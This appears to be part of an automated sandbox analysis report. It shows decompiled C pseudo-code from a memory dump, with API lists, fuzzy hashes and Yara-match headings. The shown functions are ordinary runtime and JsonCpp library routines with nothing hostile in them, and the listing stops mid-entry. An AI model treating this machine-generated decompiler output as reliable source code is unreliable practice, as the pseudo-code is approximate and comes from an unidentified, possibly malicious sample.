                                                  • String ID: bad cast
                                                  • API String ID: 3382485803-3145022300
                                                  • Opcode ID: 40a023c32f73030297f394e2b544f57369c186710ba49cffefdbeccd1091c4a8
                                                  • Instruction ID: 17ab10c1bcb3da889ba3c0cd80381a32c4fedffd91ea7508abbad60a4b834770
                                                  • Opcode Fuzzy Hash: 40a023c32f73030297f394e2b544f57369c186710ba49cffefdbeccd1091c4a8
                                                  • Instruction Fuzzy Hash: 5B212AB5D0464ADBDB14DF94D881BEEF7B0FB48350F10862AE92677394DB346901CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1003B1B2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E1003B1B2(void* __ebx, void* __edx, void* __edi, signed int _a4, long _a8, long _a12) {
				void* _t8;
				long _t10;
				signed char* _t14;
				signed int _t15;
				signed int _t17;
				signed int _t24;
				signed int _t26;

				_t26 = _a4;
				_t8 = E10038EBD(__ebx, __edx, __edi, _t26);
				_t29 = _t8 - 0xffffffff;
				if(_t8 != 0xffffffff) {
					_push(__edi);
					_t24 = SetFilePointer(_t8, _a8, 0, _a12);
					__eflags = _t24 - 0xffffffff;
					if(_t24 != 0xffffffff) {
						_t10 = 0;
						__eflags = 0;
					} else {
						_t10 = GetLastError();
					}
					__eflags = _t10;
					if(_t10 == 0) {
						_t14 =  *((intOrPtr*)(0x10404f60 + (_t26 >> 5) * 4)) + 4 + (_t26 & 0x0000001f) * 0x28;
						 *_t14 =  *_t14 & 0x000000fd;
						__eflags =  *_t14;
						_t15 = _t24;
					} else {
						_t15 = E10028E0F(_t10) | 0xffffffff;
					}
					return _t15;
				} else {
					_t17 = L10028DE9(_t29);
					 *_t17 = 9;
					return _t17 | 0xffffffff;
				}
			}










                                                  0x1003b1b3
                                                  0x1003b1b8
                                                  0x1003b1bd
                                                  0x1003b1c1
                                                  0x1003b1d3
                                                  0x1003b1e5
                                                  0x1003b1e7
                                                  0x1003b1ea
                                                  0x1003b1f4
                                                  0x1003b1f4
                                                  0x1003b1ec
                                                  0x1003b1ec
                                                  0x1003b1ec
                                                  0x1003b1f6
                                                  0x1003b1f8
                                                  0x1003b218
                                                  0x1003b21c
                                                  0x1003b21c
                                                  0x1003b21f
                                                  0x1003b1fa
                                                  0x1003b201
                                                  0x1003b201
                                                  0x1003b223
                                                  0x1003b1c3
                                                  0x1003b1c3
                                                  0x1003b1c8
                                                  0x1003b1d2
                                                  0x1003b1d2

                                                  APIs
                                                  • SetFilePointer.KERNEL32(00000000,00004000,00000000,00000109,00004000,00000109,1003868A,00000109,00000000,00000000), ref: 1003B1DF
                                                  • GetLastError.KERNEL32 ref: 1003B1EC
                                                  • __dosmaperr.LIBCMT ref: 1003B1FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                  • String ID: F*
                                                  • API String ID: 2336955059-2578036169
                                                  • Opcode ID: da889b9dd5488f43820324f9f96d729f59ef45e8aeba667e93be562567374419
                                                  • Instruction ID: 335f239801935c567e6228d49d0f3f6214c165517ed924247a08d004b9cb1564
                                                  • Opcode Fuzzy Hash: da889b9dd5488f43820324f9f96d729f59ef45e8aeba667e93be562567374419
                                                  • Instruction Fuzzy Hash: CCF02836619A225EC612CB7CBC4494B3B54DB81336F220B41F630DF1E1CF30D8808761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1013D610, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E1013D610(intOrPtr _a4, unsigned int _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				signed int _v48;
				intOrPtr _t116;

				_push(0xffffffff);
				_push(0x1016b930);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t116;
				_v48 = 0;
				E10002370( &_v44);
				_v8 = 0;
				if(_a8 > 0x7f) {
					if(_a8 > 0x7ff) {
						if(_a8 > 0xffff) {
							if(_a8 <= 0x10ffff) {
								E10005A30( &_v44, 4);
								 *((char*)(E10012DC0( &_v44, 3))) = _a8 & 0x0000003f | 0x00000080;
								 *((char*)(E10012DC0( &_v44, 2))) = _a8 >> 0x00000006 & 0x0000003f | 0x00000080;
								 *((char*)(E10012DC0( &_v44, 1))) = _a8 >> 0x0000000c & 0x0000003f | 0x00000080;
								 *((char*)(E10012DC0( &_v44, 0))) = _a8 >> 0x00000012 & 0x00000007 | 0x000000f0;
							}
						} else {
							E10005A30( &_v44, 3);
							 *((char*)(E10012DC0( &_v44, 2))) = _a8 & 0x0000003f | 0x00000080;
							 *((char*)(E10012DC0( &_v44, 1))) = _a8 >> 0x00000006 & 0x0000003f | 0x00000080;
							 *((char*)(E10012DC0( &_v44, 0))) = _a8 >> 0x0000000c & 0x0000000f | 0x000000e0;
						}
					} else {
						E10005A30( &_v44, 2);
						 *((char*)(E10012DC0( &_v44, 1))) = _a8 & 0x0000003f | 0x00000080;
						 *((char*)(E10012DC0( &_v44, 0))) = _a8 >> 0x00000006 & 0x0000001f | 0x000000c0;
					}
				} else {
					E10005A30( &_v44, 1);
					 *((char*)(E10012DC0( &_v44, 0))) = _a8;
				}
				E100012D0(_a4,  &_v44);
				_v48 = _v48 | 0x00000001;
				_v8 = 0xffffffff;
				E10001360( &_v44);
				 *[fs:0x0] = _v16;
				return _a4;
			}








                                                  0x1013d613
                                                  0x1013d615
                                                  0x1013d620
                                                  0x1013d621
                                                  0x1013d62c
                                                  0x1013d636
                                                  0x1013d63b
                                                  0x1013d646
                                                  0x1013d66d
                                                  0x1013d6b8
                                                  0x1013d71b
                                                  0x1013d722
                                                  0x1013d73d
                                                  0x1013d758
                                                  0x1013d773
                                                  0x1013d78e
                                                  0x1013d78e
                                                  0x1013d6ba
                                                  0x1013d6bf
                                                  0x1013d6da
                                                  0x1013d6f5
                                                  0x1013d710
                                                  0x1013d710
                                                  0x1013d66f
                                                  0x1013d674
                                                  0x1013d68f
                                                  0x1013d6aa
                                                  0x1013d6aa
                                                  0x1013d648
                                                  0x1013d64d
                                                  0x1013d65f
                                                  0x1013d65f
                                                  0x1013d797
                                                  0x1013d7a2
                                                  0x1013d7a5
                                                  0x1013d7af
                                                  0x1013d7ba
                                                  0x1013d7c5

                                                  APIs
                                                  • std::ios_base::clear.LIBCPMTD ref: 1013D64D
                                                  • std::ios_base::clear.LIBCPMTD ref: 1013D674
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::ios_base::clear
                                                  • String ID:
                                                  • API String ID: 1443086396-0
                                                  • Opcode ID: 04c85ef5fb611d59148f4c15f4e540b41200cacbb628f7fd503e7141f05fc289
                                                  • Instruction ID: 7a008beed75abc9e9d01a78b6b7909d014ec60387612d3f5647e38b94e2695c0
                                                  • Opcode Fuzzy Hash: 04c85ef5fb611d59148f4c15f4e540b41200cacbb628f7fd503e7141f05fc289
                                                  • Instruction Fuzzy Hash: AB41AD76980348AEDB00DFA4D8D2BCC7B30FF19360F448118E6156F1D2DA746A59CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10009CA0, Relevance: 6.1, APIs: 4, Instructions: 96memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E10009CA0(intOrPtr __ecx, intOrPtr _a4, char _a8, char _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v36;
				char _v60;
				char _v84;
				char _v96;
				intOrPtr _v100;
				intOrPtr _t73;
				void* _t85;

				_v100 = __ecx;
				_v12 = E1000B850( &_a8, E10009A40(_v100,  &_v24));
				_v8 = E1000B850( &_a20,  &_a8);
				if(_v12 >= E1000B850(E100097E0(_v100,  &_v36),  &_a20)) {
					E1000B240(_t85 - 0xc,  &_a8);
					E100097E0(_v100, _t85);
					E1000B240(_t85 - 0xfffffffffffffff4,  &_a20);
					_push( &_v84);
					E1000C430(_t85 - 0xfffffffffffffff4);
					while(1) {
						__eflags = _v8;
						if(__eflags <= 0) {
							goto L10;
						}
						E10009C00(_v100, __eflags);
						_t73 = _v8 - 1;
						__eflags = _t73;
						_v8 = _t73;
					}
				} else {
					E1000B240(_t85 - 0xc,  &_a20);
					E1000B240(_t85,  &_a8);
					E10009A40(_v100, _t85 - 0xfffffffffffffff4);
					_push( &_v60);
					E1000C3A0( &_v60);
					while(1) {
						_t95 = _v8;
						if(_v8 <= 0) {
							break;
						}
						E1000B5E0(_v100, _t95);
						_v8 = _v8 - 1;
					}
				}
				L10:
				E1000B000(E10009A40(_v100,  &_v96), _a4, _v12);
				return _a4;
			}













                                                  0x10009ca6
                                                  0x10009cbe
                                                  0x10009ccd
                                                  0x10009cea
                                                  0x10009d46
                                                  0x10009d52
                                                  0x10009d60
                                                  0x10009d68
                                                  0x10009d69
                                                  0x10009d7c
                                                  0x10009d7c
                                                  0x10009d80
                                                  0x00000000
                                                  0x00000000
                                                  0x10009d85
                                                  0x10009d76
                                                  0x10009d76
                                                  0x10009d79
                                                  0x10009d79
                                                  0x10009cec
                                                  0x10009cf5
                                                  0x10009d03
                                                  0x10009d0f
                                                  0x10009d17
                                                  0x10009d18
                                                  0x10009d2b
                                                  0x10009d2b
                                                  0x10009d2f
                                                  0x00000000
                                                  0x00000000
                                                  0x10009d34
                                                  0x10009d28
                                                  0x10009d28
                                                  0x10009d3b
                                                  0x10009d8c
                                                  0x10009da2
                                                  0x10009dad

                                                  APIs
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009CF5
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009D03
                                                    • Part of subcall function 1000C3A0: _DebugHeapAllocator.LIBCPMTD ref: 1000C3F0
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009D46
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009D60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocatorDebugHeap
                                                  • String ID:
                                                  • API String ID: 571936431-0
                                                  • Opcode ID: 808258f1aec5f36948ed59490177cca55885b9ed5bff084e0c21b3122da888ee
                                                  • Instruction ID: a9ddb65e9f4f371582b09de845b72be8d8c8d756e5c090e98bc0323d6fbb63ea
                                                  • Opcode Fuzzy Hash: 808258f1aec5f36948ed59490177cca55885b9ed5bff084e0c21b3122da888ee
                                                  • Instruction Fuzzy Hash: 34314276D1020CEBDF04EFF4D8969DE7779EF84380F00812AE9065B249EA30AB44DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000FAF0, Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E1000FAF0(intOrPtr __ecx, void* __eflags) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _t67;

				_push(0xffffffff);
				_push(0x1016b3b0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t67;
				_push(__ecx);
				_v20 = _t67 - 0x18;
				_v44 = __ecx;
				_v28 = E100151D0(_v44 + 1, 1);
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				E10009A20(_v44 + 2, E1000E8E0(_v28),  &_v32);
				_v24 = _v24 + 1;
				_v36 = 0;
				E10009A20(_v44 + 2, E1000E8F0(_v28),  &_v36);
				_v24 = _v24 + 1;
				_v40 = 0;
				E10009A20(_v44 + 2, E1000E900(_v28),  &_v40);
				_v8 = 0xffffffff;
				 *((char*)(E1000E8A0(_v28))) = 1;
				 *((char*)(E1000E8B0(_v28))) = 0;
				 *[fs:0x0] = _v16;
				return _v28;
			}













                                                  0x1000faf3
                                                  0x1000faf5
                                                  0x1000fb00
                                                  0x1000fb01
                                                  0x1000fb08
                                                  0x1000fb0f
                                                  0x1000fb12
                                                  0x1000fb22
                                                  0x1000fb25
                                                  0x1000fb2c
                                                  0x1000fb33
                                                  0x1000fb51
                                                  0x1000fb5c
                                                  0x1000fb5f
                                                  0x1000fb7d
                                                  0x1000fb88
                                                  0x1000fb8b
                                                  0x1000fba9
                                                  0x1000fc0c
                                                  0x1000fc1f
                                                  0x1000fc2e
                                                  0x1000fc37
                                                  0x1000fc44

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: allocator
                                                  • String ID:
                                                  • API String ID: 3447690668-0
                                                  • Opcode ID: 1e8ac10e548ac01737e0f35c9500240bf45ce1a8c7932cebd555f0e25cd544df
                                                  • Instruction ID: 886d3358d4855c180e59ee70d8d91a6cb6a60920bb8827e1400dbe0cecd4af85
                                                  • Opcode Fuzzy Hash: 1e8ac10e548ac01737e0f35c9500240bf45ce1a8c7932cebd555f0e25cd544df
                                                  • Instruction Fuzzy Hash: D2310AB5D002499FEB04CF98D842BEFBBB8EF48358F144519E605B7386DB756940CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10145FC0, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10145FC0(void* __ebx, void* __edi, void* __esi, short* _a4) {
				char* _v8;
				int _v12;
				int _v16;

				_v12 = E1002575D(_a4);
				_v16 = WideCharToMultiByte(0, 0, _a4, _v12, 0, 0, 0, 0);
				_t8 = _v12 + 1; // 0x1014b308
				_v8 = E100253AE(__ebx, _a4, __edi, __esi, _v12 + _t8);
				_t12 = _v12 + 1; // 0x1014b308
				E10025A10(__edi, _v8, 0, _v12 + _t12);
				WideCharToMultiByte(0, 0, _a4, _v12, _v8, _v16, 0, 0);
				return _v8;
			}






                                                  0x10145fd2
                                                  0x10145fef
                                                  0x10145ff5
                                                  0x10146002
                                                  0x10146008
                                                  0x10146013
                                                  0x10146033
                                                  0x1014603f

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,1014B307,1014B307,00000000,00000000,00000000,00000000,?,?,1014B307,00000000), ref: 10145FE9
                                                  • _malloc.LIBCMT ref: 10145FFA
                                                    • Part of subcall function 100253AE: __FF_MSGBANNER.LIBCMT ref: 100253D1
                                                    • Part of subcall function 100253AE: __NMSG_WRITE.LIBCMT ref: 100253D8
                                                    • Part of subcall function 100253AE: HeapAlloc.KERNEL32(00000000,1002359C,?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 10025426
                                                  • _memset.LIBCMT ref: 10146013
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,1014B307,1014B307,00000000,?,00000000,00000000,?,?,?,?,?,?,1014B307,00000000), ref: 10146033
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocHeap_malloc_memset
                                                  • String ID:
                                                  • API String ID: 2311837860-0
                                                  • Opcode ID: dd14aa24a6eec4401e0223a67d6faaf52b1e424ca2f6068e25d00c98b4daff88
                                                  • Instruction ID: 660105b14d497b6cb9a24f2cb11c7d51371ee9754b2a7d7652d5b22537a5de45
                                                  • Opcode Fuzzy Hash: dd14aa24a6eec4401e0223a67d6faaf52b1e424ca2f6068e25d00c98b4daff88
                                                  • Instruction Fuzzy Hash: 9A1104B9A44208BFEB10DFD4DC82F9EB7B9EB48700F108154F609AB2C1D671BA448B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1002CBBF, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E1002CBBF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1027d5b0);
				E1002EB4C(__ebx, __edi, __esi);
				_t31 = E1002B8B7(__edx, __edi, _t35);
				_t15 =  *0x10289c08; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1002E01C(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10289b10; // 0x4671300
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x102896e8;
								if(__eflags != 0) {
									_push(_t33);
									E100252D1(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10289b10; // 0x4671300
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10289b10; // 0x4671300
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1002CC5A();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1002ED46(_t25, _t29, _t31, 0x20);
				}
				return E1002EB91(_t33);
			}










                                                  0x1002cbbf
                                                  0x1002cbbf
                                                  0x1002cbbf
                                                  0x1002cbbf
                                                  0x1002cbc1
                                                  0x1002cbc6
                                                  0x1002cbd0
                                                  0x1002cbd2
                                                  0x1002cbda
                                                  0x1002cbfb
                                                  0x1002cc01
                                                  0x1002cc05
                                                  0x1002cc08
                                                  0x1002cc0b
                                                  0x1002cc11
                                                  0x1002cc13
                                                  0x1002cc15
                                                  0x1002cc18
                                                  0x1002cc1e
                                                  0x1002cc20
                                                  0x1002cc22
                                                  0x1002cc28
                                                  0x1002cc2a
                                                  0x1002cc2b
                                                  0x1002cc30
                                                  0x1002cc28
                                                  0x1002cc20
                                                  0x1002cc31
                                                  0x1002cc36
                                                  0x1002cc39
                                                  0x1002cc3f
                                                  0x1002cc43
                                                  0x1002cc43
                                                  0x1002cc49
                                                  0x1002cc50
                                                  0x1002cbe2
                                                  0x1002cbe2
                                                  0x1002cbe2
                                                  0x1002cbe7
                                                  0x1002cbeb
                                                  0x1002cbf0
                                                  0x1002cbf8

                                                  APIs
                                                    • Part of subcall function 1002B8B7: __amsg_exit.LIBCMT ref: 1002B8C5
                                                  • __amsg_exit.LIBCMT ref: 1002CBEB
                                                  • __lock.LIBCMT ref: 1002CBFB
                                                  • InterlockedDecrement.KERNEL32(?), ref: 1002CC18
                                                  • InterlockedIncrement.KERNEL32(04671300), ref: 1002CC43
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                  • String ID:
                                                  • API String ID: 4129207761-0
                                                  • Opcode ID: 7715c4f9c32f171116a43dbbef44b33c943809d38fa89fca348d4e3fc96629b6
                                                  • Instruction ID: ad92fae20f4184f40ec43aa240e40a867825198d69d1ce997911aefc2c727d13
                                                  • Opcode Fuzzy Hash: 7715c4f9c32f171116a43dbbef44b33c943809d38fa89fca348d4e3fc96629b6
                                                  • Instruction Fuzzy Hash: 9501ED39A0066A9BC712DBA8B886F8D73E0FB08750FA5400AF815A7681CB34AC40DBD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000E3D0, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E1000E3D0(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E1000ECC0(_v8, __eflags,  *((intOrPtr*)(E1000F4A0(_v8))));
				 *((intOrPtr*)(E1000F4A0(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E1000F2B0(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E1000F480(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                  0x1000e3d3
                                                  0x1000e3d4
                                                  0x1000e3e5
                                                  0x1000e3f8
                                                  0x1000e3fd
                                                  0x1000e412
                                                  0x1000e417
                                                  0x1000e422
                                                  0x1000e427

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle
                                                  • String ID:
                                                  • API String ID: 2519475695-0
                                                  • Opcode ID: 7d389c4537a8e9a154790655cc188299dab765cb01ab5c9ee2a0fe1b9495906b
                                                  • Instruction ID: 9602c7fa5371672ab2807ae449baa16fa1a822b9fad34f2c425f0f31a4d00967
                                                  • Opcode Fuzzy Hash: 7d389c4537a8e9a154790655cc188299dab765cb01ab5c9ee2a0fe1b9495906b
                                                  • Instruction Fuzzy Hash: 85F04778A00108EFD708DF99C69296EB7F5EF89344B2081D8E8095B765DB31AE01EB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1013AB30, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E1013AB30(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, char* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				char _v144;
				char _v172;
				char _v200;
				intOrPtr* _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				void* __ebp;
				intOrPtr _t34;
				void* _t49;
				void* _t69;
				void* _t70;
				intOrPtr _t71;
				void* _t72;

				_t70 = __esi;
				_t69 = __edi;
				_t49 = __ebx;
				_push(0xffffffff);
				_push(0x1016d51d);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t71;
				_t72 = _t71 - 0xc4;
				_v204 = __ecx;
				if( *_v204 != 0) {
					_push(0);
					E10138530( *_v204);
					_t72 = _t72 + 8;
					 *_v204 = 0;
				}
				if(_a4 == 0) {
					E10001320( &_v172, "assert json failed");
					_v8 = 0;
					E10138DD0( &_v172);
					_v8 = 0xffffffff;
					E10001360( &_v172);
				}
				if( *_a4 != 0 &&  *_a4 != 0x2f) {
					E10006F20( &_v144, 2, 1);
					_v8 = 1;
					E1000FF20( &_v144,  &_v144, "in Json::Value::setComment(): Comments must start with /");
					_t72 = _t72 + 8;
					_v208 = E10007040( &_v144,  &_v200);
					_v212 = _v208;
					_v8 = 2;
					E10138DD0(_v212);
					_v8 = 1;
					E10001360( &_v200);
					E10026CE8(_t49, _v208, _t69, _t70);
					_v8 = 0xffffffff;
					E10005930( &_v144, _t70);
				}
				_t34 = E10138E30(_t49, _a4, _t69, _t70, _a4, _a8);
				 *_v204 = _t34;
				 *[fs:0x0] = _v16;
				return _t34;
			}


















                                                  0x1013ab30
                                                  0x1013ab30
                                                  0x1013ab30
                                                  0x1013ab33
                                                  0x1013ab35
                                                  0x1013ab40
                                                  0x1013ab41
                                                  0x1013ab48
                                                  0x1013ab4e
                                                  0x1013ab5d
                                                  0x1013ab5f
                                                  0x1013ab6a
                                                  0x1013ab6f
                                                  0x1013ab78
                                                  0x1013ab78
                                                  0x1013ab82
                                                  0x1013ab8f
                                                  0x1013ab94
                                                  0x1013aba2
                                                  0x1013aba7
                                                  0x1013abb4
                                                  0x1013abb4
                                                  0x1013abc1
                                                  0x1013abe0
                                                  0x1013abe5
                                                  0x1013abf8
                                                  0x1013abfd
                                                  0x1013ac12
                                                  0x1013ac1e
                                                  0x1013ac24
                                                  0x1013ac2f
                                                  0x1013ac34
                                                  0x1013ac3e
                                                  0x1013ac43
                                                  0x1013ac48
                                                  0x1013ac55
                                                  0x1013ac55
                                                  0x1013ac62
                                                  0x1013ac70
                                                  0x1013ac75
                                                  0x1013ac7f

                                                  APIs
                                                  Strings
                                                  • in Json::Value::setComment(): Comments must start with /, xrefs: 1013ABEC
                                                  • assert json failed, xrefs: 1013AB84
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
